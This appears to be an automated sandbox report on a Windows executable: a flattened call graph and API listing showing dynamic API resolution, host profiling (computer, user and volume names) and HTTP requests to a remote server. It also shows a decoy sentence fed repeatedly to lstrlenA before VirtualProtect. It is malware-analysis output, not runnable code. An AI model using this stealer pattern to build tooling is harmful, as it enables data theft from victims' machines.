27054->27055 27056 4036ea 27055->27056 27057 4045c0 34 API calls 27056->27057 27058 403703 27057->27058 27059 4045c0 34 API calls 27058->27059 27060 40371c 27059->27060 27061 4045c0 34 API calls 27060->27061 27062 403735 27061->27062 27063 4045c0 34 API calls 27062->27063 27064 40374e 27063->27064 27065 4045c0 34 API calls 27064->27065 27066 403767 27065->27066 27067 4045c0 34 API calls 27066->27067 27068 403780 27067->27068 27069 4045c0 34 API calls 27068->27069 27070 403799 27069->27070 27071 4045c0 34 API calls 27070->27071 27072 4037b2 27071->27072 27073 4045c0 34 API calls 27072->27073 27074 4037cb 27073->27074 27075 4045c0 34 API calls 27074->27075 27076 4037e4 27075->27076 27077 4045c0 34 API calls 27076->27077 27078 4037fd 27077->27078 27079 4045c0 34 API calls 27078->27079 27080 403816 27079->27080 27081 4045c0 34 API calls 27080->27081 27082 40382f 27081->27082 27083 4045c0 34 API calls 27082->27083 27084 403848 27083->27084 27085 4045c0 34 API calls 27084->27085 27086 403861 27085->27086 27087 4045c0 34 API calls 27086->27087 27088 40387a 27087->27088 27089 4045c0 34 API calls 27088->27089 27090 403893 27089->27090 27091 4045c0 34 API calls 27090->27091 27092 4038ac 27091->27092 27093 4045c0 34 API calls 27092->27093 27094 4038c5 27093->27094 27095 4045c0 34 API calls 27094->27095 27096 4038de 27095->27096 27097 4045c0 34 API calls 27096->27097 27098 4038f7 27097->27098 27099 4045c0 34 API calls 27098->27099 27100 403910 27099->27100 27101 4045c0 34 API calls 27100->27101 27102 403929 27101->27102 27103 4045c0 34 API calls 27102->27103 27104 403942 27103->27104 27105 4045c0 34 API calls 27104->27105 27106 40395b 27105->27106 27107 4045c0 34 API calls 27106->27107 27108 403974 27107->27108 27109 4045c0 34 API calls 27108->27109 27110 40398d 27109->27110 27111 4045c0 34 API calls 27110->27111 27112 4039a6 27111->27112 27113 4045c0 34 API calls 27112->27113 27114 4039bf 27113->27114 27115 4045c0 34 API calls 27114->27115 27116 4039d8 27115->27116 27117 4045c0 34 API calls 27116->27117 27118 4039f1 27117->27118 27119 4045c0 34 API calls 27118->27119 27120 403a0a 27119->27120 27121 4045c0 34 API calls 27120->27121 27122 403a23 27121->27122 27123 4045c0 34 API calls 27122->27123 27124 403a3c 27123->27124 27125 4045c0 34 API calls 27124->27125 27126 403a55 27125->27126 27127 4045c0 34 API calls 27126->27127 27128 403a6e 27127->27128 27129 4045c0 34 API calls 27128->27129 27130 403a87 27129->27130 27131 4045c0 34 API calls 27130->27131 27132 403aa0 27131->27132 27133 4045c0 34 API calls 27132->27133 27134 403ab9 27133->27134 27135 4045c0 34 API calls 27134->27135 27136 403ad2 27135->27136 27137 4045c0 34 API calls 27136->27137 27138 403aeb 27137->27138 27139 4045c0 34 API calls 27138->27139 27140 403b04 27139->27140 27141 4045c0 34 API calls 27140->27141 27142 403b1d 27141->27142 27143 4045c0 34 API calls 27142->27143 27144 403b36 27143->27144 27145 4045c0 34 API calls 27144->27145 27146 403b4f 27145->27146 27147 4045c0 34 API calls 27146->27147 27148 403b68 27147->27148 27149 4045c0 34 API calls 27148->27149 27150 403b81 27149->27150 27151 4045c0 34 API calls 27150->27151 27152 403b9a 27151->27152 27153 4045c0 34 API calls 27152->27153 27154 403bb3 27153->27154 27155 4045c0 34 API calls 27154->27155 27156 403bcc 27155->27156 27157 4045c0 34 API calls 27156->27157 27158 403be5 27157->27158 27159 4045c0 34 API calls 27158->27159 27160 403bfe 27159->27160 27161 4045c0 34 API calls 27160->27161 27162 403c17 27161->27162 27163 4045c0 34 API calls 27162->27163 27164 403c30 27163->27164 27165 4045c0 34 API calls 27164->27165 27166 403c49 27165->27166 27167 4045c0 34 API calls 27166->27167 27168 403c62 27167->27168 27169 4045c0 34 API calls 27168->27169 27170 403c7b 27169->27170 27171 4045c0 34 API calls 27170->27171 27172 403c94 27171->27172 27173 4045c0 34 API calls 27172->27173 27174 403cad 27173->27174 27175 4045c0 34 API calls 27174->27175 27176 403cc6 27175->27176 27177 4045c0 34 API calls 27176->27177 27178 403cdf 27177->27178 27179 4045c0 34 API calls 27178->27179 27180 403cf8 27179->27180 27181 4045c0 34 API calls 27180->27181 27182 403d11 27181->27182 27183 4045c0 34 API calls 27182->27183 27184 403d2a 27183->27184 27185 4045c0 34 API calls 27184->27185 27186 403d43 27185->27186 27187 4045c0 34 API calls 27186->27187 27188 403d5c 27187->27188 27189 4045c0 34 API calls 27188->27189 27190 403d75 27189->27190 27191 4045c0 34 API calls 27190->27191 27192 403d8e 27191->27192 27193 4045c0 34 API calls 27192->27193 27194 403da7 27193->27194 27195 4045c0 34 API calls 27194->27195 27196 403dc0 27195->27196 27197 4045c0 34 API calls 27196->27197 27198 403dd9 27197->27198 27199 4045c0 34 API calls 27198->27199 27200 403df2 27199->27200 27201 4045c0 34 API calls 27200->27201 27202 403e0b 27201->27202 27203 4045c0 34 API calls 27202->27203 27204 403e24 27203->27204 27205 4045c0 34 API calls 27204->27205 27206 403e3d 27205->27206 27207 4045c0 34 API calls 27206->27207 27208 403e56 27207->27208 27209 4045c0 34 API calls 27208->27209 27210 403e6f 27209->27210 27211 4045c0 34 API calls 27210->27211 27212 403e88 27211->27212 27213 4045c0 34 API calls 27212->27213 27214 403ea1 27213->27214 27215 4045c0 34 API calls 27214->27215 27216 403eba 27215->27216 27217 4045c0 34 API calls 27216->27217 27218 403ed3 27217->27218 27219 4045c0 34 API calls 27218->27219 27220 403eec 27219->27220 27221 4045c0 34 API calls 27220->27221 27222 403f05 27221->27222 27223 4045c0 34 API calls 27222->27223 27224 403f1e 27223->27224 27225 4045c0 34 API calls 27224->27225 27226 403f37 27225->27226 27227 4045c0 34 API calls 27226->27227 27228 403f50 27227->27228 27229 4045c0 34 API calls 27228->27229 27230 403f69 27229->27230 27231 4045c0 34 API calls 27230->27231 27232 403f82 27231->27232 27233 4045c0 34 API calls 27232->27233 27234 403f9b 27233->27234 27235 4045c0 34 API calls 27234->27235 27236 403fb4 27235->27236 27237 4045c0 34 API calls 27236->27237 27238 403fcd 27237->27238 27239 4045c0 34 API calls 27238->27239 27240 403fe6 27239->27240 27241 4045c0 34 API calls 27240->27241 27242 403fff 27241->27242 27243 4045c0 34 API calls 27242->27243 27244 404018 27243->27244 27245 4045c0 34 API calls 27244->27245 27246 404031 27245->27246 27247 4045c0 34 API calls 27246->27247 27248 40404a 27247->27248 27249 4045c0 34 API calls 27248->27249 27250 404063 27249->27250 27251 4045c0 34 API calls 27250->27251 27252 40407c 27251->27252 27253 4045c0 34 API calls 27252->27253 27254 404095 27253->27254 27255 4045c0 34 API calls 27254->27255 27256 4040ae 27255->27256 27257 4045c0 34 API calls 27256->27257 27258 4040c7 27257->27258 27259 4045c0 34 API calls 27258->27259 27260 4040e0 27259->27260 27261 4045c0 34 API calls 27260->27261 27262 4040f9 27261->27262 27263 4045c0 34 API calls 27262->27263 27264 404112 27263->27264 27265 4045c0 34 API calls 27264->27265 27266 40412b 27265->27266 27267 4045c0 34 API calls 27266->27267 27268 404144 27267->27268 27269 4045c0 34 API calls 27268->27269 27270 40415d 27269->27270 27271 4045c0 34 API calls 27270->27271 27272 404176 27271->27272 27273 4045c0 34 API calls 27272->27273 27274 40418f 27273->27274 27275 4045c0 34 API calls 27274->27275 27276 4041a8 27275->27276 27277 4045c0 34 API calls 27276->27277 27278 4041c1 27277->27278 27279 4045c0 34 API calls 27278->27279 27280 4041da 27279->27280 27281 4045c0 34 API calls 27280->27281 27282 4041f3 27281->27282 27283 4045c0 34 API calls 27282->27283 27284 40420c 27283->27284 27285 4045c0 34 API calls 27284->27285 27286 404225 27285->27286 27287 4045c0 34 API calls 27286->27287 27288 40423e 27287->27288 27289 4045c0 34 API calls 27288->27289 27290 404257 27289->27290 27291 4045c0 34 API calls 27290->27291 27292 404270 27291->27292 27293 4045c0 34 API calls 27292->27293 27294 404289 27293->27294 27295 4045c0 34 API calls 27294->27295 27296 4042a2 27295->27296 27297 4045c0 34 API calls 27296->27297 27298 4042bb 27297->27298 27299 4045c0 34 API calls 27298->27299 27300 4042d4 27299->27300 27301 4045c0 34 API calls 27300->27301 27302 4042ed 27301->27302 27303 4045c0 34 API calls 27302->27303 27304 404306 27303->27304 27305 4045c0 34 API calls 27304->27305 27306 40431f 27305->27306 27307 4045c0 34 API calls 27306->27307 27308 404338 27307->27308 27309 4045c0 34 API calls 27308->27309 27310 404351 27309->27310 27311 4045c0 34 API calls 27310->27311 27312 40436a 27311->27312 27313 4045c0 34 API calls 27312->27313 27314 404383 27313->27314 27315 4045c0 34 API calls 27314->27315 27316 40439c 27315->27316 27317 4045c0 34 API calls 27316->27317 27318 4043b5 27317->27318 27319 4045c0 34 API calls 27318->27319 27320 4043ce 27319->27320 27321 4045c0 34 API calls 27320->27321 27322 4043e7 27321->27322 27323 4045c0 34 API calls 27322->27323 27324 404400 27323->27324 27325 4045c0 34 API calls 27324->27325 27326 404419 27325->27326 27327 4045c0 34 API calls 27326->27327 27328 404432 27327->27328 27329 4045c0 34 API calls 27328->27329 27330 40444b 27329->27330 27331 4045c0 34 API calls 27330->27331 27332 404464 27331->27332 27333 4045c0 34 API calls 27332->27333 27334 40447d 27333->27334 27335 4045c0 34 API calls 27334->27335 27336 404496 27335->27336 27337 4045c0 34 API calls 27336->27337 27338 4044af 27337->27338 27339 4045c0 34 API calls 27338->27339 27340 4044c8 27339->27340 27341 4045c0 34 API calls 27340->27341 27342 4044e1 27341->27342 27343 4045c0 34 API calls 27342->27343 27344 4044fa 27343->27344 27345 4045c0 34 API calls 27344->27345 27346 404513 27345->27346 27347 4045c0 34 API calls 27346->27347 27348 40452c 27347->27348 27349 4045c0 34 API calls 27348->27349 27350 404545 27349->27350 27351 4045c0 34 API calls 27350->27351 27352 40455e 27351->27352 27353 4045c0 34 API calls 27352->27353 27354 404577 27353->27354 27355 4045c0 34 API calls 27354->27355 27356 404590 27355->27356 27357 4045c0 34 API calls 27356->27357 27358 4045a9 27357->27358 27359 419c10 27358->27359 27360 419c20 43 API calls 27359->27360 27361 41a036 8 API calls 27359->27361 27360->27361 27362 41a146 27361->27362 27363 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27361->27363 27364 41a153 8 API calls 27362->27364 27365 41a216 27362->27365 27363->27362 27364->27365 27366 41a298 27365->27366 27367 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27365->27367 27368 41a2a5 6 API calls 27366->27368 27369 41a337 27366->27369 27367->27366 27368->27369 27370 41a344 9 API calls 27369->27370 27371 41a41f 27369->27371 27370->27371 27372 41a4a2 27371->27372 27373 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27371->27373 27374 41a4ab GetProcAddress GetProcAddress 27372->27374 27375 41a4dc 27372->27375 27373->27372 27374->27375 27376 41a515 27375->27376 27377 41a4e5 GetProcAddress GetProcAddress 27375->27377 27378 41a612 27376->27378 27379 41a522 10 API calls 27376->27379 27377->27376 27380 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27378->27380 27381 41a67d 27378->27381 27379->27378 27380->27381 27382 41a686 GetProcAddress 27381->27382 27383 41a69e 27381->27383 27382->27383 27384 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27383->27384 27385 415ca3 27383->27385 27384->27385 27386 401590 27385->27386 27661 401670 27386->27661 27389 41a7a0 lstrcpy 27390 4015b5 27389->27390 27391 41a7a0 lstrcpy 27390->27391 27392 4015c7 27391->27392 27393 41a7a0 lstrcpy 27392->27393 27394 4015d9 27393->27394 27395 41a7a0 lstrcpy 27394->27395 27396 401663 27395->27396 27397 415510 27396->27397 27398 415521 27397->27398 27399 41a820 2 API calls 27398->27399 27400 41552e 27399->27400 27401 41a820 2 API calls 27400->27401 27402 41553b 27401->27402 27403 41a820 2 API calls 27402->27403 27404 415548 27403->27404 27405 41a740 lstrcpy 27404->27405 27406 415555 27405->27406 27407 41a740 lstrcpy 27406->27407 27408 415562 27407->27408 27409 41a740 lstrcpy 27408->27409 27410 41556f 27409->27410 27411 41a740 lstrcpy 27410->27411 27451 41557c 27411->27451 27412 41a820 lstrlenA lstrcpy 27412->27451 27413 41a8a0 lstrcpy 27413->27451 27414 415643 StrCmpCA 27414->27451 27415 4156a0 StrCmpCA 27416 4157dc 27415->27416 27415->27451 27417 41a8a0 lstrcpy 27416->27417 27418 4157e8 27417->27418 27419 41a820 2 API calls 27418->27419 27421 4157f6 27419->27421 27420 4151f0 23 API calls 27420->27451 27423 41a820 2 API calls 27421->27423 27422 415856 StrCmpCA 27424 415991 27422->27424 27422->27451 27426 415805 27423->27426 27425 41a8a0 lstrcpy 27424->27425 27428 41599d 27425->27428 27429 401670 lstrcpy 27426->27429 27427 401590 lstrcpy 27427->27451 27430 41a820 2 API calls 27428->27430 27449 415811 27429->27449 27432 4159ab 27430->27432 27431 4152c0 29 API calls 27431->27451 27434 41a820 2 API calls 27432->27434 27433 415a0b StrCmpCA 27435 415a16 Sleep 27433->27435 27436 415a28 27433->27436 27439 4159ba 27434->27439 27435->27451 27438 41a8a0 lstrcpy 27436->27438 27437 41a740 lstrcpy 27437->27451 27440 415a34 27438->27440 27441 401670 lstrcpy 27439->27441 27442 41a820 2 API calls 27440->27442 27441->27449 27443 415a43 27442->27443 27444 41a820 2 API calls 27443->27444 27445 415a52 27444->27445 27447 401670 lstrcpy 27445->27447 27446 41578a StrCmpCA 27446->27451 27447->27449 27448 41a7a0 lstrcpy 27448->27451 27449->26505 27450 41593f StrCmpCA 27450->27451 27451->27412 27451->27413 27451->27414 27451->27415 27451->27420 27451->27422 27451->27427 27451->27431 27451->27433 27451->27437 27451->27446 27451->27448 27451->27450 27453 417553 GetVolumeInformationA 27452->27453 27454 41754c 27452->27454 27455 417591 27453->27455 27454->27453 27456 4175fc GetProcessHeap HeapAlloc 27455->27456 27457 417619 27456->27457 27458 417628 wsprintfA 27456->27458 27459 41a740 lstrcpy 27457->27459 27460 41a740 lstrcpy 27458->27460 27461 415da7 27459->27461 27460->27461 27461->26526 27463 41a7a0 lstrcpy 27462->27463 27464 404899 27463->27464 27670 4047b0 27464->27670 27466 4048a5 27467 41a740 lstrcpy 27466->27467 27468 4048d7 27467->27468 27469 41a740 lstrcpy 27468->27469 27470 4048e4 27469->27470 27471 41a740 lstrcpy 27470->27471 27472 4048f1 27471->27472 27473 41a740 lstrcpy 27472->27473 27474 4048fe 27473->27474 27475 41a740 lstrcpy 27474->27475 27476 40490b InternetOpenA StrCmpCA 27475->27476 27477 404944 27476->27477 27478 404955 27477->27478 27479 404ecb InternetCloseHandle 27477->27479 27683 418b60 GetSystemTime lstrcpy lstrcpy 27478->27683 27481 404ee8 27479->27481 27678 409ac0 CryptStringToBinaryA 27481->27678 27482 404963 27684 41a920 lstrcpy lstrcpy lstrcatA 27482->27684 27485 404976 27487 41a8a0 lstrcpy 27485->27487 27493 40497f 27487->27493 27488 41a820 2 API calls 27489 404f05 27488->27489 27490 41a9b0 4 API calls 27489->27490 27492 404f1b 27490->27492 27491 404f27 moneypunct 27495 41a7a0 lstrcpy 27491->27495 27494 41a8a0 lstrcpy 27492->27494 27496 41a9b0 4 API calls 27493->27496 27494->27491 27508 404f57 27495->27508 27497 4049a9 27496->27497 27498 41a8a0 lstrcpy 27497->27498 27499 4049b2 27498->27499 27500 41a9b0 4 API calls 27499->27500 27501 4049d1 27500->27501 27502 41a8a0 lstrcpy 27501->27502 27503 4049da 27502->27503 27685 41a920 lstrcpy lstrcpy lstrcatA 27503->27685 27505 4049f8 27506 41a8a0 lstrcpy 27505->27506 27507 404a01 27506->27507 27509 41a9b0 4 API calls 27507->27509 27508->26529 27510 404a20 27509->27510 27511 41a8a0 lstrcpy 27510->27511 27512 404a29 27511->27512 27513 41a9b0 4 API calls 27512->27513 27514 404a48 27513->27514 27515 41a8a0 lstrcpy 27514->27515 27516 404a51 27515->27516 27517 41a9b0 4 API calls 27516->27517 27518 404a7d 27517->27518 27686 41a920 lstrcpy lstrcpy lstrcatA 27518->27686 27520 404a84 27521 41a8a0 lstrcpy 27520->27521 27522 404a8d 27521->27522 27523 404aa3 InternetConnectA 27522->27523 27523->27479 27524 404ad3 HttpOpenRequestA 27523->27524 27526 404b28 27524->27526 27527 404ebe InternetCloseHandle 27524->27527 27528 41a9b0 4 API calls 27526->27528 27527->27479 27529 404b3c 27528->27529 27530 41a8a0 lstrcpy 27529->27530 27531 404b45 27530->27531 27687 41a920 lstrcpy lstrcpy lstrcatA 27531->27687 27533 404b63 27534 41a8a0 lstrcpy 27533->27534 27535 404b6c 27534->27535 27536 41a9b0 4 API calls 27535->27536 27537 404b8b 27536->27537 27538 41a8a0 lstrcpy 27537->27538 27539 404b94 27538->27539 27540 41a9b0 4 API calls 27539->27540 27541 404bb5 27540->27541 27542 41a8a0 lstrcpy 27541->27542 27543 404bbe 27542->27543 27544 41a9b0 4 API calls 27543->27544 27545 404bde 27544->27545 27546 41a8a0 lstrcpy 27545->27546 27547 404be7 27546->27547 27548 41a9b0 4 API calls 27547->27548 27549 404c06 27548->27549 27550 41a8a0 lstrcpy 27549->27550 27551 404c0f 27550->27551 27688 41a920 lstrcpy lstrcpy lstrcatA 27551->27688 27553 404c2d 27554 41a8a0 lstrcpy 27553->27554 27555 404c36 27554->27555 27556 41a9b0 4 API calls 27555->27556 27557 404c55 27556->27557 27558 41a8a0 lstrcpy 27557->27558 27559 404c5e 27558->27559 27560 41a9b0 4 API calls 27559->27560 27561 404c7d 27560->27561 27562 41a8a0 lstrcpy 27561->27562 27563 404c86 27562->27563 27689 41a920 lstrcpy lstrcpy lstrcatA 27563->27689 27565 404ca4 27566 41a8a0 lstrcpy 27565->27566 27567 404cad 27566->27567 27568 41a9b0 4 API calls 27567->27568 27569 404ccc 27568->27569 27570 41a8a0 lstrcpy 27569->27570 27571 404cd5 27570->27571 27572 41a9b0 4 API calls 27571->27572 27573 404cf6 27572->27573 27574 41a8a0 lstrcpy 27573->27574 27575 404cff 27574->27575 27576 41a9b0 4 API calls 27575->27576 27577 404d1f 27576->27577 27578 41a8a0 lstrcpy 27577->27578 27579 404d28 27578->27579 27580 41a9b0 4 API calls 27579->27580 27581 404d47 27580->27581 27582 41a8a0 lstrcpy 27581->27582 27583 404d50 27582->27583 27690 41a920 lstrcpy lstrcpy lstrcatA 27583->27690 27585 404d6e 27586 41a8a0 lstrcpy 27585->27586 27587 404d77 27586->27587 27588 41a740 lstrcpy 27587->27588 27589 404d92 27588->27589 27691 41a920 lstrcpy lstrcpy lstrcatA 27589->27691 27591 404db3 27692 41a920 lstrcpy lstrcpy lstrcatA 27591->27692 27593 404dba 27594 41a8a0 lstrcpy 27593->27594 27595 404dc6 27594->27595 27596 404de7 lstrlenA 27595->27596 27597 404dfa 27596->27597 27598 404e03 lstrlenA 27597->27598 27693 41aad0 27598->27693 27600 404e13 HttpSendRequestA 27601 404e32 InternetReadFile 27600->27601 27602 404e67 InternetCloseHandle 27601->27602 27607 404e5e 27601->27607 27605 41a800 27602->27605 27604 41a9b0 4 API calls 27604->27607 27605->27527 27606 41a8a0 lstrcpy 27606->27607 27607->27601 27607->27602 27607->27604 27607->27606 27698 41aad0 27608->27698 27610 4117c4 StrCmpCA 27611 4117d7 27610->27611 27612 4117cf ExitProcess 27610->27612 27613 4117e7 strtok_s 27611->27613 27616 4117f4 27613->27616 27614 4119c2 27614->26531 27615 41199e strtok_s 27615->27616 27616->27614 27616->27615 27617 4118ad StrCmpCA 27616->27617 27618 4118cf StrCmpCA 27616->27618 27619 4118f1 StrCmpCA 27616->27619 27620 411951 StrCmpCA 27616->27620 27621 411970 StrCmpCA 27616->27621 27622 411913 StrCmpCA 27616->27622 27623 411932 StrCmpCA 27616->27623 27624 41185d StrCmpCA 27616->27624 27625 41187f StrCmpCA 27616->27625 27626 41a820 lstrlenA lstrcpy 27616->27626 27627 41a820 2 API calls 27616->27627 27617->27616 27618->27616 27619->27616 27620->27616 27621->27616 27622->27616 27623->27616 27624->27616 27625->27616 27626->27616 27627->27615 27628->26537 27629->26539 27630->26545 27631->26547 27632->26553 27633->26555 27634->26559 27635->26563 27636->26567 27637->26573 27638->26575 27639->26579 27640->26593 27641->26597 27642->26596 27643->26592 27644->26596 27645->26612 27646->26600 27647->26602 27648->26606 27649->26608 27650->26614 27651->26616 27652->26623 27653->26629 27654->26650 27655->26654 27656->26653 27657->26649 27658->26653 27659->26663 27662 41a7a0 lstrcpy 27661->27662 27663 401683 27662->27663 27664 41a7a0 lstrcpy 27663->27664 27665 401695 27664->27665 27666 41a7a0 lstrcpy 27665->27666 27667 4016a7 27666->27667 27668 41a7a0 lstrcpy 27667->27668 27669 4015a3 27668->27669 27669->27389 27694 401030 27670->27694 27674 404838 lstrlenA 27697 41aad0 27674->27697 27676 404848 InternetCrackUrlA 27677 404867 27676->27677 27677->27466 27679 409af9 LocalAlloc 27678->27679 27680 404eee 27678->27680 27679->27680 27681 409b14 CryptStringToBinaryA 27679->27681 27680->27488 27680->27491 27681->27680 27682 409b39 LocalFree 27681->27682 27682->27680 27683->27482 27684->27485 27685->27505 27686->27520 27687->27533 27688->27553 27689->27565 27690->27585 27691->27591 27692->27593 27693->27600 27695 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27694->27695 27696 41aad0 27695->27696 27696->27674 27697->27676 27698->27610 27823 23f102b StrCmpCA strtok_s lstrlen lstrcpy 27825 416ab1 902 API calls 27795 4069f3 7 API calls 27863 23f118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 27827 23f3823 StrCmpCA StrCmpCA StrCmpCA StrCmpCA strtok_s 27828 41cafe 219 API calls 5 library calls 27829 23f30f9 7 API calls 27830 23ef8f1 32 API calls 26270 401190 26277 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26270->26277 26272 40119e 26273 4011cc 26272->26273 26279 417850 GetProcessHeap HeapAlloc GetUserNameA 26272->26279 26275 4011b7 26275->26273 26276 4011c4 ExitProcess 26275->26276 26278 417939 26277->26278 26278->26272 26280 4178c3 26279->26280 26280->26275 27832 23fcce9 162 API calls ___crtGetStringTypeA 27871 23f19e7 StrCmpCA ExitProcess strtok_s strtok_s 27872 23f35e4 9 API calls 27833 41ce9f 69 API calls __amsg_exit 27834 23f3823 8 API calls 27772 4088a4 RaiseException task __CxxThrowException@8 27773 4180a5 GetProcessHeap HeapFree 27837 23f30d0 9 API calls 27798 41b9b0 RtlUnwind 27799 23f13c7 strtok_s strtok_s

                                            Control-flow Graph

                                            APIs
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                            • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                            • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                            • strlen.MSVCRT ref: 004046F0
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                            Strings
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
